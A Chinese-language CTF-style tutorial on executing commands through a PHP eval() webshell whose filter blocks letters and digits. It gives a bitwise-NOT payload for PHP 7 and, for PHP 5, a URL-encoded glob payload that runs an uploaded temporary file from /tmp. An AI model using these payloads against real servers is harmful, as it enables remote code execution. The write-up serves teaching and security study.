无字母数字webshell之命令执行

无字母数字的webshell构造技巧

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

分析这道题的限制：
1、webshell长度不能超过35位。
2、不能输入大小写字母、数字、_和$.

php7下简单解决问题

php7是允许($a)();执行动态函数，例如(‘phpinfo’)();所以，我们可以构造一个可以生成phpinfo这个字符串的php表达式即可。payload如下（不可见字符用url编码表示，其实也就是phpinfo取反为%8F%97%8F%96%91%99%90，当其再次取反，那么就是phpinfo）：

(~%8F%97%8F%96%91%99%90)();

?code=(~%8F%97%8F%96%91%99%90)();

什么是取反呢？
回想计算机组成原理的原码、反码、补码。这里的反码才是取反。

php5下解决问题

尝试php7下的payload。显然是不可以的。
那我们不妨尝试其他方法。
在上传文件时，会在/tmp下生成一个临时文件，很快就被删除，那怎么处理？
现在要解决几个问题：怎么在临时文件没被删除时匹配到他？以怎样的方式匹配？以及怎么执行。
先创建一个文件上传，上传文件查看临时文件。

已经生成临时文件，那么如何匹配呢？下面分析。可以使用到.加空格加文件进行执行，就算没有权限一样可以执行。
那么接下来解决匹配文件名的问题。
多次观察发现临时文件的最后一位一次是大写，一次是小写，但在Linux下没有名字为大写的文件。
那么就要用的glob通配符了。

glob

？匹配任意一个字符。
* 匹配任意多个字符

匹配4位任意字符

????

排除第三位为.的

??[^.]?

查询ascii码和global规则之后发现，可以下面这样匹配大写字母

[@-[]

那么匹配临时文件就是

/tmp/????????[@-[]

开始操作

首先抓一个上传文件的包和web.php的包。
上传文件里面写入

#!/bin/bash/

id

将web.php的包改为POST方式，并且将上传文件的包中的Content-Type以及文件内容也放进web.php的包。并且利用get的方式传递参数。
get的参数code最终会走入eval中。
官方文档查eval函数发现要先把其闭合，再写自己的代码。并且<?php可以写成<?=。
get传递的参数为

?code=?><?=`. /???/????????[@-[]`;?>

又因为是通过url传递，不能传递空格等，那么只能使用url编码对?以及空格和；进行编码。空格可以使用+代替

?code=%3F%3E%3C%3F%3D%60%2E%20%2F%3F%3F%3F%2F%3F%3F%3F%3F%3F%3F%3F%3F%5B%40%2D%5B%5D%60%3B%3F%3E

在burp里可以不用转码。